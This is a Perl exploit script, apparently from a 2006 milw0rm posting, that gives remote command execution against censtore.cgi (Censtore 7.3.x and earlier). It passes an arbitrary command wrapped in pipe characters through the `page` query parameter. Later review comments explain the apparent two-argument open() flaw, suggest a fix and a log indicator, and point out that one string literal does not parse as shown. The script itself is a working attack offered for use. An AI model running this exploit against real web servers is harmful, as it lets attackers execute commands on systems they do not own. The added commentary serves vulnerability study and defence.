Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit :

Date : 2006-04-13 Author : FOX_MULDER
#!/usr/bin/perl
#
#  Censtore.cgi exploit by FOX_MULDER ([email protected])
#
#  Vulnerability found by FOX_MULDER.
#
#  This is the first exploit i release and the bug is not public so enjoy.
#  Ask http://censtore.com/ what they think about it !!!  
#
###########################

use IO::Socket;
use LWP::Simple; 

# Usage: print a banner and the expected command line (host, path, command)
# to STDERR, then terminate the script. `exit` is called without an argument,
# so the process ends with status 0 even on this error path.
# NOTE(review): the double quotes around cmd inside the second message are
# not escaped, so the string literal ends early and the listing does not
# parse as shown; the escapes were presumably lost when the page was
# extracted (the messages also contain literal newlines) -- confirm against
# an original copy.
sub Usage {
print STDERR "
FOX_MULDER DID IT AGAIN !!!
";
print STDERR "Usage:
cenex.pl <www.example.com> </path/> "cmd"
";
exit;
}

# Main flow of the proof-of-concept: check the argument count, read the three
# command-line arguments, send one HTTP GET to censtore.cgi, print the reply.
# The page title gives the affected range as Censtore <= 7.3.x.

# Fewer than three arguments: show the usage text and stop (Usage() exits).
if (@ARGV < 3)
{
 Usage();
}


# @ARGV[n] is a one-element array slice; in these scalar assignments it yields
# the element itself, but `use warnings` would suggest $ARGV[n] instead.
# The file has no `use strict`, so $host, $path and $command are package globals.
# None of the three values is validated or encoded before use below.
$host = @ARGV[0];
$path = @ARGV[1];
$command = @ARGV[2];
# Banner output only; no effect on the request.
print "

 !!! ULTRA PRIVATE EDITION !!! 

";
print "censtore.cgi Remote Command Execution Exploit by FOX_MULDER
";

print "
[+] Conecting to $host
";

# The whole interaction is this single GET: the `page` query parameter is set
# to the command wrapped in pipe characters.
# NOTE(review): the pipes suggest that censtore.cgi passes `page` to a
# two-argument open(), where a leading or trailing `|` makes Perl run the
# value as a command instead of opening a file -- the CGI source is not shown
# here, so confirm before relying on this.
# Defensive reading: on the server side the fix for that pattern is a
# three-argument open with an explicit '<' mode plus an allowlist of page
# names; in web logs, requests to censtore.cgi whose `page` value contains
# `|` (or its encoded form %7C) are the indicator to search for.
# LWP::Simple::get returns undef when the request fails.
my $result = get("http://$host$path/censtore.cgi?page=|$command|"); 

# The response body is printed verbatim; a failed request only produces the
# generic error line, with no status code or reason.
if (defined $result) { 
print $result; 
} 
else { 
print "Error with request.
"; 
}

# milw0rm.com [2006-04-13]
